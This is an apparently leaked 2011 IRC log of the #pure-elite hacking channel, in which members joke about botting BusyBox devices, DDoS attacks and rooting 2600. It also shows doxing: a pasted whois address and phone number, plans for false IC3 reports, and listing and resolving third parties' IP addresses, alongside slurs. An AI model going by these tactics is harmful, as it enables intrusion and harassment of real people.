#pure-eliteMay 31 11:53:30AvunitAnyway need to move asap, i only havent spoken to devrandom yetMay 31 11:53:44NeuronAvunit: cap_sasl.pl 404May 31 11:53:59AvunitwutMay 31 11:53:59AvunitsecMay 31 11:55:55Avunitoh i know xDMay 31 11:56:48[redacted]brbMay 31 11:56:54Python interface unloaded**** ENDING LOGGING AT TueMay 31 11:56:542011**** BEGIN LOGGING AT TueMay 31 11:58:252011May 31 11:58:25*	Now talking on #pure-eliteMay 31 11:58:25*	Topic for #pure-elite is: [pE] security research and development. | PRIV8!PRIV8!PRIV8! No leaks, no vanity. Everything stays here. | work with trollpoll on .es targets. MSG him for infos. google search site:gob.es for funMay 31 11:58:25*	Topic for #pure-elite set by Sabu!sabu@netadmin.operationfreedom.ru at Wed May 25 16:25:57 2011May 31 11:59:09NeuronAvunit: :( don't like us irssi guys ;(May 31 11:59:14AvunitLOLMay 31 11:59:16AvunitsowwieMay 31 12:00:54Avunitfixd gimme a secMay 31 12:01:47NeuronrgrMay 31 12:02:16Avunitthere you goMay 31 12:03:17Avunitlighttpd thought you wanted to execute a .pl scriptMay 31 12:03:22Avunitand was like OH NO YOU DIDNTMay 31 12:03:45NeuronXDMay 31 12:04:24Avunitso chagned it to .txt :P just save and rename it to cap_sasl.plMay 31 12:05:50NeuronbrbMay 31 12:05:53*	Neuron has quit (Quit: leaving)May 31 12:06:32*	Avunit has changed the topic to: Get on the new IRCd; use your login @ http://46.243.12.9/docs/ to check how to!May 31 12:07:01*	Avunit has changed the topic to: Get on the new IRCd; use your login @ http://46.243.12.9/docs/ to check how to! /join #pure-elite on the new IRCd!May 31 12:08:09*	Neuron (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure-eliteMay 31 12:08:18Neuronirss = /sasl command not findMay 31 12:08:52AvuniteekMay 31 12:09:00Avunitdid you load the script?May 31 12:09:18Neuronlet me try againMay 31 12:09:23*	Neuron has quit (Quit: leaving)May 31 12:26:36*	Neuron_ (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure-eliteMay 31 12:26:42&lt;neuron_&gt;	Avunit: your script hates backtrack :PMay 31 12:26:56Avunitnot miens D:May 31 12:27:02*	Topiary has quit (Quit: restarting client)May 31 12:27:47&lt;neuron_&gt;	brb thrid tryMay 31 12:27:54*	Neuron_ has quit (Quit: leaving)May 31 12:28:04*	Topiary (t@HA-581.fpm.h7vc0g.IP) has joined #pure-eliteMay 31 12:50:18*	Neuron (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure-eliteMay 31 12:50:22Neuron...May 31 12:50:26AvunitneuronMay 31 12:50:29Neurongiving me connection refusedMay 31 12:50:31Avunithttp://pthree.org/2010/01/31/freenode-ssl-and-sasl-authentication-with-irssi/May 31 12:50:41Avunitthat means you didnt use the right port or didnt SASL authMay 31 12:51:04NeuronrgrMay 31 12:52:17Topiary9001 or 9002May 31 12:52:29Avunit1 = ssl, 2 = NO SSL BIATCHMay 31 12:53:10*	Neuron has quit (Quit: leaving)May 31 13:03:05*	Neuron (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure-eliteMay 31 13:03:26NeuronAvunit: lol really quick which password the one you just gave me or the oone for nickserv here.. both hate me equallyMay 31 13:03:30Neuron:)May 31 13:03:41Avunitthe one ig ave youMay 31 13:03:51Neuroncapital N on Neuron or lowercase/May 31 13:03:54AvunitcapitalMay 31 13:04:41Neuronback to fighting with it :)May 31 13:07:43Neuronim sure its because im doing something stupidMay 31 13:07:46*	Neuron has quit (Quit: leaving)May 31 13:15:00*	Neuron (Neuron@HA-dvk.col.tt2aeb.IP) has joined #pure-eliteMay 31 13:15:30NeuronAvunit: wanna know what the problem was XD i was naming my network PE in my config....May 31 13:15:53Topiaryhappened to me first timeMay 31 13:16:03TopiaryI auth'd to shipyard but named my net freedomsaslMay 31 13:21:27Neuronok was hoping iw asn't the only one :EMay 31 15:00:16stormyoMay 31 15:17:39*	Disconnected (Remote host closed socket).**** ENDING LOGGING AT TueMay 31 15:17:392011**** BEGIN LOGGING AT TueMay 31 23:51:532011May 31 23:51:53*	Now talking on #pure-eliteMay 31 23:51:53*	Topic for #pure-elite is: PRIV8. NO LEAKS. RESPECT EACH OTHER. RESEARCH AND EXPLOIT DEV!May 31 23:51:53*	Topic for #pure-elite set by Sabu!sabu@netadmin.operationfreedom.ru at TueMay 31 18:48:232011May 31 23:52:05Neurono/ hey [redacted]May 31 23:52:09[redacted]helloMay 31 23:52:11[redacted]did i miss anything?May 31 23:52:16Neuronnothing reallyMay 31 23:52:21[redacted]lot of news coverageMay 31 23:52:32Neuronjust me and kayla trying to bot 38k or so busybox's you?May 31 23:53:44[redacted]XDMay 31 23:53:46[redacted]nothing at allMay 31 23:53:49[redacted]that sounds niceMay 31 23:54:18Neuronthe most i can do is make a bash script that acts has a irc client and we can issue commands that wayJun 01 01:04:47*	value has quit (Connection closed)Jun 01 01:19:35*	value (value@HA-ao3.bsr.r1bp4m.IP) has joined #pure-eliteJun 01 01:28:38*	Topiary (t@HA-r9b.fpm.h7vc0g.IP) has joined #pure-eliteJun 01 01:29:53*	Neuron has quit (Ping timeout: 121 seconds)Jun 01 01:32:26*	Neuron (Neuron@HA-l0q.345.a84vd3.IP) has joined #pure-eliteJun 01 01:39:34Recursionhttp://i.imgur.com/DsgWI.jpgJun 01 01:40:10TopiaryOoh that's a much better screencapJun 01 01:40:14Topiarythe one I had earlier was lameJun 01 01:40:18Topiaryoh man it includes the twitterJun 01 01:40:29Topiaryfucking Wall Street Journal printed a twitter nameJun 01 01:40:32Topiaryand a fucking cat in spaceJun 01 01:40:40NeuronXDJun 01 01:41:12Neuronthats epicJun 01 01:56:12joepie92http://www.nasa.gov/multimedia/nasatv/index.htmlJun 01 01:56:29joepie92supposedly a shuttle is going to landJun 01 01:56:31joepie92or some shitJun 01 01:57:07stormhiJun 01 01:57:41NeuronlolJun 01 01:57:43NeuronwatchingJun 01 02:13:02*	Topiary has quit (Ping timeout: 121 seconds)Jun 01 02:14:08*	Topiary (t@HA-cin.fpm.h7vc0g.IP) has joined #pure-eliteJun 01 02:18:29Topiaryanything exciting on Nasa?Jun 01 02:19:02stormhi TopiaryJun 01 02:19:06Topiaryhey stormJun 01 02:19:20stormsupJun 01 02:19:45Topiaryjust woke up, anything exciting happening with you?Jun 01 02:19:53stormyeah i just ate bbqJun 01 02:19:54storm:DJun 01 02:20:10stormand i just woke up as wellJun 01 02:20:26*	Neuron has quit (Quit: leaving)Jun 01 02:20:38TopiaryBBQ for breakfast, mmmJun 01 02:22:06stormyessirJun 01 02:22:14stormespecially at 222amJun 01 02:22:17stormxDJun 01 02:23:42*	lol (lol@HA-r3c.ts4.h3kc47.IP) has joined #pure-eliteJun 01 02:23:48lolhey guys :)Jun 01 02:25:16Topiaryhi kaylaJun 01 02:25:30stormahJun 01 02:25:32stormso lol is kaylaJun 01 02:25:35stormmakes senseJun 01 02:25:36storm;xJun 01 02:26:01lol:DJun 01 02:26:03stormi should have known with all those facesJun 01 02:26:27lollmaoJun 01 02:26:30lolhow goes :D?Jun 01 02:26:34stormlolsJun 01 02:26:36stormfineJun 01 02:26:46stormstill looking for an rfi/lfi bot :pJun 01 02:28:30loli've got one lol :D with google bypass, if the bypass still works xDJun 01 02:28:52lolbut it's on a USB but i think the USB might be infected xDJun 01 02:29:04lolso im scared to plug it in xDJun 01 02:31:02*	Topiary has quit (Ping timeout: 121 seconds)Jun 01 02:31:49stormlolJun 01 02:31:57stormget off windows and nothing is ever infected!Jun 01 02:33:55joepie92it r landing naoJun 01 02:33:56joepie92I believeJun 01 02:34:02joepie92http://www.ustream.tv/nasahdtvJun 01 02:34:04joepie92:PJun 01 02:34:30joepie92also, storm, kayla is rather recognizable :PJun 01 02:36:39stormorly?Jun 01 02:36:49joepie92yarlyJun 01 02:37:06joepie92I recall one line from lol being quotedJun 01 02:37:12joepie92and I was liek ohey dats kaylaJun 01 02:37:13joepie92lolJun 01 02:38:21joepie92alsoJun 01 02:38:27joepie92landed spaceshuttle has landedJun 01 02:38:28joepie92:PJun 01 02:38:31*	Topiary (t@HA-tic.fpm.h7vc0g.IP) has joined #pure-eliteJun 01 02:38:50Topiaryhey storm, did you shit on 2600 again earlier?Jun 01 02:39:26lolapparnently they want more :oJun 01 02:39:27lol:DJun 01 02:39:36Topiarymore you sayJun 01 02:43:12lolmooooooooooooooooooooooooooooooooooooooooooooreJun 01 02:43:23Topiarymy connection is being a dickJun 01 02:43:26TopiaryI think it's the weatherJun 01 02:43:48stormyeshJun 01 02:43:50stormi didJun 01 02:43:53stormwy?Jun 01 02:43:55stormwhy?*Jun 01 02:44:14stormi brought madjack down to like 17 users or somethingJun 01 02:44:25lollolJun 01 02:44:34stormas well as collectiveJun 01 02:44:39storm;PJun 01 02:45:05Topiaryheh they madJun 01 02:45:56stormhowsoJun 01 02:46:13Topiarywell Overlord Mighty Jester himself was tweeting at usJun 01 02:46:16Topiarycalling us failures :(Jun 01 02:46:28lollolJun 01 02:47:10stormlmfaoJun 01 02:47:13stormwhereJun 01 02:47:16stormlink a nigJun 01 02:48:00lolhttps://twitter.com/#!/th3j35t3rJun 01 02:48:04Topiary^Jun 01 02:48:05loltht is t35t3rJun 01 02:48:18loltbh he needs owning :DJun 01 02:48:26Topiaryhe's needed owning for a long time indeedJun 01 02:48:38Topiaryyou gotta love it thoughJun 01 02:48:49Topiaryhis little fortress with his minions, his DoS tool and his blogJun 01 02:48:54Topiaryhis world must be so smallJun 01 02:49:03storm@anonakomis, @lulzsec, whatever, whoever. I AM BUSY. So how bout ya fuck off? Show some grace at least. R WE DONE YET?Jun 01 02:49:04stormroflJun 01 02:49:20Topiarystorm: this is the dude that claims to have DDoS'd WikiLeaksJun 01 02:49:30stormniceJun 01 02:49:38Topiaryspeaking of, did you guys know WikiLeaks tweeted our PBS Tupac story?Jun 01 02:49:46stormyesJun 01 02:49:48stormi was aroundJun 01 02:49:49storm:)Jun 01 02:51:03stormthis guy has a lot of crying postsJun 01 02:52:33Topiaryaye he's a barrel of joyJun 01 02:52:56stormawinee AwineeJun 01 02:52:56storm@Jun 01 02:52:56storm@maxxmac1 @LulzSec my loic broke so i stopped for the night. Happy playingJun 01 02:53:15stormis that the windows dos tool he showed to cameras?Jun 01 02:53:36Topiarythat was HOIC, he fired it at his own government from his home IPJun 01 02:53:41Topiaryto "test" itJun 01 02:53:49stormlmfaoJun 01 02:53:58stormterribleJun 01 02:54:03TopiaryJester's DoS tool = Apache 0day + slowloris + TorJun 01 02:54:17stormmy dos tool is over ten years old and at least it spoofsJun 01 02:54:28storm;pJun 01 02:54:36Topiarynaturally you are a sexy beastJun 01 02:54:41storm:DJun 01 02:55:55Topiarytl;dr on awinee - he's insanely lonely/ugly so even treats our mockery as a sign of attentionJun 01 02:56:09stormhahahaJun 01 02:56:16Topiarytl;dr on Jester - pompous elitism-fueling blogger with TorJun 01 02:56:21Topiarytl;dr on the rest of them - sheepJun 01 02:56:58stormi use tor to ssh out ;d does theeze make me leet?Jun 01 02:57:16Topiaryyes it doesJun 01 02:57:37lolno it makes you a ver patient person :OJun 01 02:57:46lolSSH over TOR is looooooooooooooooooow xDJun 01 02:57:52lolvery*Jun 01 02:58:00stormroflJun 01 02:58:00stormdudeJun 01 02:58:02stormi agreeJun 01 02:58:06stormtor is slow as ballsJun 01 02:58:10stormbtwJun 01 02:58:12stormFailSec?Jun 01 02:58:15stormwtf is this shitJun 01 02:58:21Topiarystorm, we've had stalkers like that for monthsJun 01 02:58:24Topiarythey follow us everywhere we goJun 01 02:58:27Topiarythey monitor everything we doJun 01 02:58:31Topiarythey make parodies of all our accountsJun 01 02:58:33Topiarywe're kind of like a rock bandJun 01 02:58:36Topiaryas someone put itJun 01 02:58:53stormlmfaoJun 01 02:59:27lolit's got tht bad attentions seeking Adrian lamo wen't and reg'd lulzsec.com proberbly so onw day somone whois it out of curiosity and sees his name so he can get a mention lolJun 01 02:59:41loleven on his site, he had links to google searches of himselfJun 01 02:59:46Topiaryguys did you see Adrien tweeted us insulting shit?Jun 01 02:59:54stormwellJun 01 02:59:58stormi can get you guysJun 01 02:59:58loli dont think he's ever hacked anythingJun 01 03:00:02stormlulsec.lulz.netJun 01 03:00:10stormor sec.lulz.netJun 01 03:00:11stormor whateverJun 01 03:00:22Topiarywe're working on a website at the momentJun 01 03:00:28Topiary'sides we already has haz.lulz.netJun 01 03:00:41TopiaryI will show you the design for the site so farJun 01 03:00:46stormyou have access to lulz.net?Jun 01 03:00:53stormmy friend owns it &gt;:|Jun 01 03:01:15[redacted]lulz.net is ran by furrysJun 01 03:01:18[redacted]yiff in hellJun 01 03:01:18[redacted]:]Jun 01 03:01:45Topiaryhttp://i.imgur.com/dFaz0.jpg banner at the top links to whatever, rest is just background (including rainbow)Jun 01 03:01:45stormwatJun 01 03:01:49Topiaryit's in progress etcJun 01 03:01:53lolim a furry im sat here in my fur suit :DJun 01 03:02:02[redacted]oh you troll :DJun 01 03:02:37stormFailSec The Fail BoatJun 01 03:02:37storm@Jun 01 03:02:37storm@awinee @LulzSec so ok i ran this thing but nothing happened, wth chinese pirates are killing my cuban refugees!Jun 01 03:02:43stormis he talking about my ddoses?Jun 01 03:02:48stormcause i hit from chinese boxesJun 01 03:02:50stormlolJun 01 03:03:15Topiarynah they don't know where China is on the mapJun 01 03:03:18Topiarylet alone what a box isJun 01 03:03:20stormprobably looks like a botnet of china residentalsJun 01 03:03:33stormahhJun 01 03:06:02stormi guess i put too much credit in peopleJun 01 03:06:19loli say we just root 2600 and sniff their IRCD for a few monthJun 01 03:06:47Topiaryeasier said than don-- wait, you're kayla :xJun 01 03:06:54Topiaryeasier done than said in that caseJun 01 03:06:57stormi want an apache 0day &gt;:| sniff the fk out of themJun 01 03:06:58joepie92TopiaryJun 01 03:07:05joepie92do you has any more screenshots of site design?Jun 01 03:07:16Topiarynot reallyJun 01 03:07:17Topiarywhy?Jun 01 03:07:53joepie92because I'm curious :PJun 01 03:08:49Topiaryonly has this other one: http://i.imgur.com/3WpEq.jpgJun 01 03:08:54Topiarywhere the rainbow chills behind and the border is goneJun 01 03:08:55joepie92what the shit - adrian lamo registered lulzsec.com?Jun 01 03:09:16joepie92also, Topiary, make the rainbow overlay the page content :3Jun 01 03:09:32*	devrandom (devrandom@HA-cgq.t9g.4u7qps.IP) has joined #pure-eliteJun 01 03:09:52Topiaryindeed joepieJun 01 03:09:58&lt;devrandom&gt;	hello folksJun 01 03:10:09lolhey :DJun 01 03:10:16Topiaryand yes he didJun 01 03:10:19Topiaryhttp://whois.domaintools.com/lulzsec.comJun 01 03:10:48lolim telling you :DJun 01 03:10:52lolit's cos he's an attention seekerJun 01 03:10:54&lt;devrandom&gt;	sorry i haven't been in much ... got a new machine, been working on vm shiteJun 01 03:10:58lolit's so someone whois itJun 01 03:11:01loland sees his nameJun 01 03:11:05lolso he gets a mentionJun 01 03:11:06lollolJun 01 03:11:15lolreally do hate ppl like thatJun 01 03:11:52lolhe's never hacked anything, he sat out side of some building cracked their wifi and then went and told them so he could get arrested and get a mention lolJun 01 03:11:54lolwtfJun 01 03:11:54Topiarythe world would be a better place without 2600 ;xJun 01 03:12:04lolhe has links to google searchs of himselfJun 01 03:12:12lolhe really, really is lonelyJun 01 03:12:43stormso are they a target aside from just packeting?Jun 01 03:12:59lolthey are complete fair game :)Jun 01 03:13:15lolthe j3st3rs dox would be nice :)Jun 01 03:13:18Topiarywell A) they are a bunch of asshats, B) Jester is a fucktard who *everyone* would want to destroy, C) Apache 0day, D) Adrian needs a spankingJun 01 03:13:29joepie92E) bring the lulzJun 01 03:13:30joepie92:DJun 01 03:13:35Topiaryyes, that tooJun 01 03:14:44Topiaryah wait that was Adrian Chen sending us those insulting tweetsJun 01 03:14:47Topiaryboth losersJun 01 03:15:14stormi like C most of allJun 01 03:15:15storm;xJun 01 03:15:17Topiaryhe tried to arrange an interview with LulzSec, told him to fuck off before Gawker gets rootedJun 01 03:15:26Topiarythen he tweets us saying PBS hack was stupidJun 01 03:15:36lolisn't tht apache 0day pub yet?Jun 01 03:15:37Topiarycuts deep :(Jun 01 03:16:26stormwell if it were public it wouldnt be a 0day anymoreJun 01 03:16:27storm;xJun 01 03:16:34loltru :oJun 01 03:18:03Topiary(Jester's flavour of choice is Ubuntu, FYI)Jun 01 03:18:18lolNS History:Jun 01 03:18:18lol1 change on 2 unique name servers over 0 year.Jun 01 03:18:18lolReverse IP:Jun 01 03:18:18lol164,461 other sites hosted on this server.Jun 01 03:18:18lolLog In or Create a FREE account to start monitoring this domain nameJun 01 03:18:18lolDomainTools for WindowsÂ®Jun 01 03:18:18lolNow you can access domain ownership records anytime, anywhere... right from your own desktop! Download Now&gt;Jun 01 03:18:18lolDomain Name: lulzsec.comJun 01 03:18:18lolRegistrant Contact:Jun 01 03:18:18lolAdrian LamoJun 01 03:18:18lolLulzSec LLCJun 01 03:18:18lol108 WEST 13TH STREETJun 01 03:18:19lolWilmington, Delaware 19801-1145Jun 01 03:18:20lolUSJun 01 03:18:21lol+1.8889201981Jun 01 03:18:53loldo you think he's tht much of an attention seeker to use his real address?Jun 01 03:19:05Topiarywe could always call his assJun 01 03:19:08lolcan someone in the US phone tht number and see if it's really him?Jun 01 03:19:12TopiaryI'll call himJun 01 03:19:32lolif so i'll do some ic3 requests as him being the leader of luzsec, he owns the domain afterallJun 01 03:19:41joepie92&gt;LulzSec LLCJun 01 03:19:42lol:DJun 01 03:19:47Topiarywhat does he sound like?Jun 01 03:20:02lola looserJun 01 03:20:04lolxDJun 01 03:20:10loljust say you are mediaJun 01 03:20:14loland you found the domainJun 01 03:20:20loland you'd like to interview himJun 01 03:20:27lolfeed his need for attentionJun 01 03:20:30lol:DJun 01 03:20:30joepie92big potential for lulz is bigJun 01 03:20:54lolyes :DJun 01 03:20:57Topiarycalling him nowJun 01 03:21:00TopiaryringringJun 01 03:21:05joepie92TopiaryJun 01 03:21:06joepie92skypeJun 01 03:21:06stormat 3am lolJun 01 03:21:06joepie92:(Jun 01 03:21:08joepie92and tinychatJun 01 03:21:09lol:3Jun 01 03:21:16stormi agree @ skypeJun 01 03:21:16storm;xJun 01 03:21:22Topiaryhe's not there, AT&amp;T virtual blahblahblah not availableJun 01 03:21:26joepie92lolJun 01 03:21:33joepie92AT&amp;T :oJun 01 03:21:42joepie92didn't we have some... AT&amp;T noms?Jun 01 03:21:50lolyes :DJun 01 03:22:06loli think it was only their buisnuiess stuff?Jun 01 03:22:09joepie92yeJun 01 03:22:09joepie92wellJun 01 03:22:16joepie92it wouldnt surprise meJun 01 03:22:20joepie92if Lamo had a business acctJun 01 03:22:42joepie92Topiary.Jun 01 03:22:47joepie92someone thinks Avunit is youJun 01 03:22:54Topiarysomeone thinks everyone is meJun 01 03:22:59joepie92lolJun 01 03:23:04stormI am TopiaryJun 01 03:23:06joepie92http://anons.wikia.com/wiki/TopiaryJun 01 03:23:07loleven im Topiary :DJun 01 03:23:11storm^Jun 01 03:23:12Topiarygoddamnit what the fuck is thatJun 01 03:23:13stormI'm lol tooJun 01 03:23:15joepie92AliasesJun 01 03:23:16joepie92Topiary, AVUnit, WhirlpoolJun 01 03:23:18storm;dJun 01 03:23:23lolthis entire channel is Topiary talking to himself :DJun 01 03:23:28joepie92alsoJun 01 03:23:30joepie92that is a wikiJun 01 03:23:32joepie92with tinychat screencapsJun 01 03:23:44joepie92and small amounts of doxJun 01 03:23:44lolscreen sessions, screen sessions everywhereJun 01 03:24:10Topiaryattributes: cautiousJun 01 03:24:15Topiarywhat-does-it-mean.aviJun 01 03:24:28joepie92lolJun 01 03:24:29joepie92soJun 01 03:24:32joepie92what I am wondering aboutJun 01 03:24:40joepie92is why "Homosexual" is not just in the Attributes templateJun 01 03:24:48joepie92as 99% of the tinychatfags seems to fit that descriptionJun 01 03:25:07Topiary"frequently makes prank calls"Jun 01 03:25:13TopiaryI went on TinyChat one night and did them :(Jun 01 03:25:19Topiarythese guys have done their research!!11Jun 01 03:25:22joepie92lolJun 01 03:25:24lolwe need to pwn a media/mews company and offer j35t3r an interview see if he bites, see what we can extract out of him?Jun 01 03:25:41lolpose as mediaJun 01 03:25:43lol:DJun 01 03:26:00stormkayla 4 prezJun 01 03:26:51Topiarythis is worse than the time some faggot did thisJun 01 03:26:52Topiaryhttp://en.wikipedia.org/wiki/Topiary_%28hacktivist%29Jun 01 03:26:57Topiarycan we delete this somehow?Jun 01 03:27:21joepie92interesting.... the guy who made the wikia one is using anonineJun 01 03:27:27lolIt's worth noting that he has a particular fondness for bitcoins, and is likely the one who manages the bitcoin donations to LulzSec.Jun 01 03:27:30stormNot much is known about Corey, except that he uses a voice changer on TinyChat to deepen his voice and the he will incessantly ask to see men's genitals while trying to engage them in the webcam equivalent of phone sex. He seems to be particularly interested in Topiary.Jun 01 03:27:32stormROFLMFAOJun 01 03:27:38joepie92and Topiary, you can always play the notability cadJun 01 03:27:39joepie92card*Jun 01 03:27:57joepie92if you sound convinced enough that you're not notableJun 01 03:28:00joepie92wikipedo's will remove anythingJun 01 03:28:15joepie92storm: fun thing is that's coreys actual voiceJun 01 03:28:15joepie92lolJun 01 03:28:20joepie92:DJun 01 03:28:22*	joepie92 lulzJun 01 03:28:25stormxDJun 01 03:28:29Topiarywho made this Wiki?Jun 01 03:28:36Topiarybecause all their facts come from lurking in TinyChat for one nightJun 01 03:28:59*	devrandom has quit (Quit: leaving)Jun 01 03:29:11lolawinee was braggin about being in a tiny chat on his twitter lolJun 01 03:29:18joepie92HAJun 01 03:29:19Topiaryyeah he wasJun 01 03:29:20joepie92FUCKING MORONJun 01 03:29:20joepie92http://anons.wikia.com/wiki/Special:Contributions/76.106.247.143Jun 01 03:29:22joepie92HAHAHAHAJun 01 03:29:28joepie92c-76-106-247-143.hsd1.fl.comcast.netJun 01 03:29:31joepie92nice vpn broJun 01 03:29:34lolproberbly him, someone shuld include his dox on tht wiki page as supreme anonymous leaderJun 01 03:29:35TopiarysecJun 01 03:29:52lollol deffinetly not VPN :DJun 01 03:29:57lolsomeone social tht ISPJun 01 03:29:58lol:DJun 01 03:30:12joepie92other person uses anonineJun 01 03:30:24joepie92so I guess it's time for some user searching on anonopsJun 01 03:30:25joepie92:DJun 01 03:30:39Topiary* Asherah (Asherah@93-94-245-147.dynamic.swissvpn.net)Jun 01 03:30:39Topiaryasherah_ is Asherah@74.115.212.38 * AsherahJun 01 03:30:39Topiary* amob (~amob@pool-71-191-255-116.washdc.fios.verizon.net)Jun 01 03:30:39Topiary* Cephurs (~wtf@pool-71-126-168-162.washdc.fios.verizon.net)Jun 01 03:30:39Topiarycephurs was ~ching@LCaen-156-54-21-76.w80-11.abo.wanadoo.fr * ...Jun 01 03:30:39Topiarycephurs was ~ching@85.17.254.135 * ...Jun 01 03:30:43Topiarycephurs was ~ching@rainbowwarrior.torservers.net * ...Jun 01 03:30:45lolfuck if it was road runner i know someone who can fully dox IP -&gt; address name everythingJun 01 03:30:45Topiary* T71 (T71@66-168-112-216.dhcp.oxfr.ma.charter.com) has joined #jesterJun 01 03:30:47Topiary=== bluesoul120 &lt;~bluesoul@46.20.33.115&gt; ''bluesoul''Jun 01 03:30:49Topiarybluesoul120 is ~bluesoul@178.86.6.11 * bluesoulJun 01 03:30:51Topiarygodbert (~godbert@c-98-250-11-251.hsd1.mi.comcast.net) has joined #jesterJun 01 03:30:53Topiarygodbert was ~godbert@cpe-68-173-45-234.nyc.res.rr.com * juevos rancherosJun 01 03:30:55TopiaryMatches?Jun 01 03:31:24joepie92173.244.215.65.static.midphase.comJun 01 03:31:40lolc-76-106-247-143.hsd1.fl.comcast.netJun 01 03:31:40lolis flordia?Jun 01 03:31:42joepie92let me get the other ipsJun 01 03:31:42joepie92yaJun 01 03:31:48stormi'm in floridaJun 01 03:31:50storm:OJun 01 03:31:53lol:oJun 01 03:32:16joepie92Naam:    76-216-232-237.lightspeed.sndgca.sbcglobal.netJun 01 03:32:16joepie92Address:  76.216.232.237Jun 01 03:33:00joepie92Naam:    219-89-200-76.adsl.xtra.co.nzJun 01 03:33:00joepie92Address:  219.89.200.76Jun 01 03:33:57joepie92okJun 01 03:34:00joepie92that's itJun 01 03:34:05joepie92can't see Nonynews' IPJun 01 03:34:20joepie92full list of IPs that have edited the wiki (that are visible) isJun 01 03:34:20joepie92188.126.75.119Jun 01 03:34:20joepie9276.106.247.143Jun 01 03:34:20joepie92173.244.215.65Jun 01 03:34:20joepie9276.216.232.237Jun 01 03:34:20joepie92219.89.200.76Jun 01 03:37:01joepie92whoopsieJun 01 03:37:03joepie92seems I just found a hitJun 01 03:37:20joepie92anyone has any idea how I can see the actual nick connected to an IP?Jun 01 03:37:26joepie92/os session only shows the countJun 01 03:37:59lolhow lol :D?Jun 01 03:39:19Topiary188.126.75.119Jun 01 03:39:25Topiarythat's StrongVPNJun 01 03:39:31TopiaryI've used that exact server beforeJun 01 03:39:52lol:OJun 01 03:39:57lolthen it was YOUUUUUUUUUUUUUJun 01 03:40:52joepie921 ip matched, but it was kerkun _removing_ shit from the wikiJun 01 03:40:58joepie92so that's not an issueJun 01 03:41:15Topiary219.89.200.76 = Auckland NZ?Jun 01 03:41:35joepie92TopiaryJun 01 03:41:37joepie92that was not strongvpnJun 01 03:41:39joepie92but anonineJun 01 03:41:54Topiaryare you sure? I've been on the 188.126.* range before on StrongVPNJun 01 03:42:02joepie92C:\Users\ton&gt;nslookup 188.126.75.119Jun 01 03:42:02joepie92Server:  google-public-dns-a.google.comJun 01 03:42:02joepie92Address:  8.8.8.8Jun 01 03:42:02joepie92Naam:    75-119.anonymous.at.anonine.comJun 01 03:42:02joepie92Address:  188.126.75.119Jun 01 03:42:07TopiaryinterestingJun 01 03:42:22joepie92might be a shared rangeJun 01 03:42:51joepie92there's not so many anonine users.... on anonops...Jun 01 03:42:54joepie92lemme check for the rangeJun 01 03:43:38Topiarythat's Stockholm, Sweden at any rateJun 01 03:43:53Topiarythought it was; I should really go back to StrongVPN's Swedish jazz, real fastJun 01 03:46:03joepie92can't find any of the other rangesJun 01 03:46:04joepie92soJun 01 03:46:05joepie92idkJun 01 03:46:13joepie92I'll keep an eye out on these rangesJun 01 03:47:03Topiarywell judging from reading all of their pages (which I just did), I'd say it's awineeJun 01 03:47:28Topiaryconsidering their main base of facts/screenshots comes from TinyChat.com/AnonOpsParty in the last 6 daysJun 01 03:47:40joepie92unsureJun 01 03:47:46joepie92it's not just awineeJun 01 03:47:50Topiaryother nicks: f00, dumb, test, awineecamslutJun 01 03:47:52joepie92that wiki has mention of phenzen being raidedJun 01 03:47:57joepie92afaik that was not shared in tinychatJun 01 03:47:59Topiarydespite my absolute drunkenness, I remember those names trollingJun 01 03:48:03joepie92wait, since when is f00 == awinee?Jun 01 03:48:18Topiaryoh, f00 might not have been trollin'Jun 01 03:48:23joepie92f00 is a trollJun 01 03:48:25joepie92he is with ryanJun 01 03:48:28joepie92and is known for fucking shit upJun 01 03:48:32Topiaryah, he was in TinyChatJun 01 03:48:34joepie92but afaik it's not awineeJun 01 03:50:16Topiaryokay well, I'm staying away from TinyChat with those camwhores anywayJun 01 03:50:23TopiarySabu and I got a bit carried away and gave LulzSec away a bitJun 01 03:51:08TopiaryI'm just assuming it's fakegregghoush + co., they monitor all of Parmy's postsJun 01 03:51:19TopiaryI used "Whirlpool" in a recent LulzSec interview (the only interview)Jun 01 03:51:24Topiarywith Parmy; their Wiki is updated with itJun 01 03:53:20[redacted]mfw joepie's on windowsJun 01 03:59:12[redacted]http://www.youtube.com/watch?v=Au8LGtxwEO4Jun 01 03:59:50lolyou know whatJun 01 03:59:57lolnow i think about itJun 01 04:00:04lolall these j35tr fagsJun 01 04:00:17lolare all ppl who've been caught dossing or somethingJun 01 04:00:29lolyou think they turned FBI bitch :D?Jun 01 04:00:40[redacted]its a conspiracyJun 01 04:01:50joepie92yes, joepie is on windowsJun 01 04:01:51joepie92becauseJun 01 04:01:52joepie92my fuckingJun 01 04:01:53joepie92routerJun 01 04:01:54joepie92is brokenJun 01 04:01:59joepie92and refuses to assign an IP to my linux boxJun 01 04:02:02[redacted]excusesJun 01 04:02:03joepie92no matter what I doJun 01 04:02:03[redacted]excusesJun 01 04:02:13[redacted]learn to ifconfig :DJun 01 04:02:22storm^Jun 01 04:02:28stormLinux nimbus 2.6.38-8-generic #42-Ubuntu SMP Mon Apr 11 03:31:24 UTC 2011 x86_64 x86_64 x86_64 GNU/LinuxJun 01 04:02:31joepie92[redacted]Jun 01 04:02:35joepie92the issue is my routers/modemJun 01 04:02:43joepie92I have a shitty sweex router that never worked properlyJun 01 04:02:47[redacted]sure rightJun 01 04:02:48joepie92a thomson speedtouch modemJun 01 04:02:51joepie92that is shitJun 01 04:02:52[redacted]but it somehow synchs with your XP boxJun 01 04:02:55[redacted]automagicallyJun 01 04:03:02[redacted]over DHCPJun 01 04:03:02joepie92and a sitecom wifi router that has issues with assigning an IPJun 01 04:03:04joepie92ehJun 01 04:03:07joepie92because that always workedJun 01 04:03:12joepie92the wifi issue is only since recentlyJun 01 04:03:14Topiaryjoepie just likes WindowsJun 01 04:03:18joepie92or rather, the IP assignment issue*Jun 01 04:03:42[redacted]:DJun 01 04:03:45stormWindows is rubbishJun 01 04:03:48joepie92it isJun 01 04:03:51joepie92so is speedtouchJun 01 04:03:56joepie92so is sitecomJun 01 04:04:00joepie92and so is especially sweexJun 01 04:04:08stormsup m_Jun 01 04:04:10storm:)Jun 01 04:04:11joepie92I have some of the most retarded network equipment someone can possible haveJun 01 04:04:11joepie92-_-Jun 01 04:04:13joepie92possibly*Jun 01 04:04:17[redacted]not much bro :]Jun 01 04:06:23stormniceJun 01 04:07:03[redacted]found a nice lfi on the box we're supposed to migrate tooJun 01 04:07:04[redacted]lolJun 01 